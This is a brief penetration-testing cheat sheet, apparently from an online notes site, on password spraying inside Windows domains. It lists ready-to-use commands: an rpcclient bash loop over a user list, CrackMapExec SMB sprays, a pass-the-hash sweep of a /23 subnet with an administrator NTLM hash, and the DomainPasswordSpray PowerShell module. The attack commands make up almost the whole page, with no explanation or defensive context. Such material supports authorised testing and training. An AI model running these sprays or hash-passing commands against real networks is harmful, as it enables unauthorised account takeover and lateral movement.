Internal Password Spraying

Password Spraying

Spraying From Linux

Bash 1 Liner

for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" <IP> | grep Authority; done

CrackMapExec Password Spray

sudo crackmapexec smb <IP> -u valid_users.txt -p Password123 | grep +

CrackMapExec Local-auth

sudo crackmapexec smb --local-auth 172.16.5.0/23 -u administrator -H 88ad09182de639ccc6579eb0849751cf | grep +

Spraying From Windows

https://github.com/dafthack/DomainPasswordSpray

PowerShell

# Import Module
Import-Module .\DomainPasswordSpray.ps1

# Spray
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
PreviousPassword AttacksNextRemote Password Attacks

Last updated